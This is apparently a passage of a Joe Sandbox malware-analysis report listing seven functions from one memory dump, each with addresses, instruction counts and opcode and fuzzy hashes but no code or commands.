                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cee2408228aa822b09a5702424b5817e60f841d6bfbc5a9b59d793376423798c
                                                • Instruction ID: 0d6423d52c84f0e200bad8ff713c9d9d6d77bbda14b1c1119dd69ab3da807640
                                                • Opcode Fuzzy Hash: cee2408228aa822b09a5702424b5817e60f841d6bfbc5a9b59d793376423798c
                                                • Instruction Fuzzy Hash: EB0128B2B041546FDB058E689810AEE7BE7DFC8751B18806AF905D7384DAB1CC028790
                                                Function 0275D2D0 Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2c23555630d78deeaf2d0ab466d22f557df4946dd9d1015643fc526e2e87b2b
                                                • Instruction ID: 2aed25e49fac81244f91bcbbe2ef5d8e511ee5d540654524ffb57da1155c91d9
                                                • Opcode Fuzzy Hash: b2c23555630d78deeaf2d0ab466d22f557df4946dd9d1015643fc526e2e87b2b
                                                • Instruction Fuzzy Hash: 08E07D71852104DFC702CFB4A96835E77F1DB07310F204496880CE3390D7340D06DB00
                                                Function 02752010 Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93a3b04369401115a06d3141408376c855e374febd1d43bb1c8a7c0adca08004
                                                • Instruction ID: 977444b62b0286e88dc88bb7fac9d54b6f1e9daf0e6532e6198aa54a6d597dba
                                                • Opcode Fuzzy Hash: 93a3b04369401115a06d3141408376c855e374febd1d43bb1c8a7c0adca08004
                                                • Instruction Fuzzy Hash: 4FE0D831D143659BCB11ABA5D8054EEBF34FE97320F4545B6D9A43B141EB70171AC391
                                                Function 02752020 Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8c1733454ff9b64c2efb7e518f695e7a41f1d285651dc21a44ad2aa6b6305d7
                                                • Instruction ID: fe27369d7b8262936b771fb611b032e460adf0ab99204cf3f54e820d5babc0e3
                                                • Opcode Fuzzy Hash: e8c1733454ff9b64c2efb7e518f695e7a41f1d285651dc21a44ad2aa6b6305d7
                                                • Instruction Fuzzy Hash: BAD01231D6022A978B01ABA5DC044DEBB38FE95361B504666D51437140EB70265986E1
                                                Function 02758258 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                • Instruction ID: 6596d3cc0fa2d050005e04ee3d012f1f4f0a0cff911ae45a75399f50255e3f3c
                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                • Instruction Fuzzy Hash: 7BC0123320C1382BA624208F7C40AA7AB8CC2C12B4A250237F91CE3200A8829C8041AA
                                                Function 0275A70D Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cde4f48070822c4c7481bd90dc5f250891eb98f26af48f91c14cb6ccc19f391
                                                • Instruction ID: 210c1e58320d2c9e22f3913b954d852480db675f1bb436b35bea000b20899003
                                                • Opcode Fuzzy Hash: 3cde4f48070822c4c7481bd90dc5f250891eb98f26af48f91c14cb6ccc19f391
                                                • Instruction Fuzzy Hash: F5D0677AB010089FDB049F98E8509DDB7B6FB9C221B448166F915A3260C6319961DB54
                                                Function 02755EB8 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1714425632.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2750000_VtPPJdSqnkbmja.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e07b23a69bc7e9ac256c4c1a4b5912421e4d2bbf1dfa87ffa449bb99c31f3d65
                                                • Instruction ID: b2163b737ec8b90940dd827e2965fc496146b814a3c4f3c0450436709a32e326
                                                • Opcode Fuzzy Hash: e07b23a69bc7e9ac256c4c1a4b5912421e4d2bbf1dfa87ffa449bb99c31f3d65
                                                • Instruction Fuzzy Hash: AAC01230110B0A47E54AFBB1E945A55336EA6C0A04F40C5A0B00A0561BFFFC59845A92